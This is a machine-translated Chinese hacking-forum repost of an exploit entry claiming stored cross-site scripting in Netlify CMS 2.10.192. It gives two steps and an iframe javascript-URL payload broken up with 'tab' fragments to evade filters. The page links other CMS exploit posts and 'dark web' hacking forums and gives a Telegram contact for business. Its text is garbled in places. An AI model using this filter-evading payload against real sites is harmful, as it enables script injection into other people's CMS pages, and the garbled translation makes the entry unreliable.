Netlify CMS 2.10.192-存储的跨站点脚本（XSS）

黑客倉庫站長

贡献: 83%

＃利用标题: NetLify CMS 2.10.192-存储的跨站点脚本（XSS）
＃利用作者: TMRSWRR
＃供应商homepage3360 https://decapcms.org/docs/intro/
＃软件link: https://github.com/decaporg/decap-cms
＃版本: 2.10.192
＃测试在: https://cms-demo.netlify.com
Description:
1。转到新帖子并写下身体领域，您的PAYLOAD:

cms-demo.netlify.com

有效载荷=iframe src=javatab; sctab; ript:altab; ert（）/iframe
2。保存之后XSS有效载荷将执行并查看警报框

	CSZCMS v1.3.0 - SQL 注入（已验证） Root #Hack7er1949 01 21, 2025 POC/?Day
	POC 骑士CMS远程代码执行 Shacker 09 13, 2024 POC/?Day
	POC 骑士cms Shacker 09 13, 2024 POC/?Day
	Winter CMS 1.2.3 - 服务器端模板注入 (SSTI)（已验证） Root #Hack7er1949 01 21, 2025 POC/?Day
H	WBCE CMS 1.6.1-多个存储的跨站点脚本（XSS） HackApt-37 Team 04 9, 2025 POC/?Day

Partner Website 友情鏈接 : 臺灣駭客團隊論壇全球最大的中文黑客论坛 한국 해커 팀 포럼 dark Web hacking team 骇客团队 HACKER.BZ UKhacker
暗网黑客论坛网站：声明，本网站的教程、文章、工具和其他相关内容仅供学习和研究使用，旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动，禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作： @HackAptTeam 网站地图Sitemap